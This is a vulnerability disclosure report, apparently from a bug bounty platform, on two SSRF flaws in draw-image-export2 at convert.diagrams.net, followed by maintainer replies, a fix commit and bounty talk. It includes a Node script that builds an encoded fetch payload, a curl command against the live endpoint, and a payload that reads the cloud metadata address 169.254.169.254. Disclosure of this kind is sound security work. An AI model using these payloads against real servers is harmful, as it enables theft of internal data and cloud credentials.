Server Side Request Forgery in jgraph/draw-image-export2

Valid

Reported on

May 18th 2022


Description

There are two SSRF's in the draw-image-export2 repository, both work on the domain convert.diagrams.net

One is a Blind SSRF the other one a Full Response SSRF.

Blind SSRF

The first one is simple and can be invoked by accessing the following URL:

https://convert.diagrams.net/node/export?url=<remote url>

Once accessed, Node fetches the url (export.js:L420)

Full Response SSRF

The second one is a bit more complex, it uses Javascript inside the Puppeteer headless Chrome instance to fetch a remote url and display the content, which will be sent back to the attacker as an image. The payload can be generated using the following code:

const zlib = require('zlib');
const payload = "<script>fetch('http://local-or-remote-url').then(res => res.text()).then(data => obj = data).then(() => document.write(obj))</script>";
const encoded = encodeURIComponent(Buffer.from(zlib.deflateRawSync(Buffer.from(payload))).toString("base64"));
console.log(encoded);

Once generated invoke the SSRF using curl: curl "https://convert.diagrams.net/node/export?html=<payload>" --output response.png

Possible fix

The url supplied to fetch needs to be checked before the request is made, and regarding the Full Response SSRF, it is possible to disable Javascript in Puppeteer, which limits the impact of the vulnerability. But it would still be possible to do a Blind SSRF using an <img> tag for example.

Impact

This vulnerability is capable of stealing sensitive information and making requests as the server.

We are processing your report and will contact the jgraph/draw-image-export2 team within 24 hours. a month ago
David Benson validated this vulnerability a month ago
myxl has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
myxl
a month ago

Researcher


Update: It's also possible to leak information about the host using a payload like this: <script>window.location.href='http://169.254.169.254/latest/dynamic/instance-identity/document';</script>

David Benson
a month ago

Maintainer


https://github.com/jgraph/draw-image-export2/commit/daa4eb72283616054ef04055dcf27477b482541c will be the fix.

myxl
a month ago

Researcher


Looks good! May it be possible to receive a slightly bigger bounty? Since it's a Full Response SSRF and can be exploited on production to leak information about the host etc.

David Benson
a month ago

Maintainer


@admin We don't have this repo covered yet. Is it possible to assign our $900 high bounty here as a one off and add to our billing?

Jamie Slome
a month ago

Admin


@davidjgraph - sorted 👍

Jamie Slome
a month ago

Admin


As a one-off, we have also added this to the billing 😊

myxl
a month ago

Researcher


I appreciate it, thank you!

David Benson confirmed that a fix has been merged on daa4eb a month ago
The fix bounty has been dropped
to join this conversation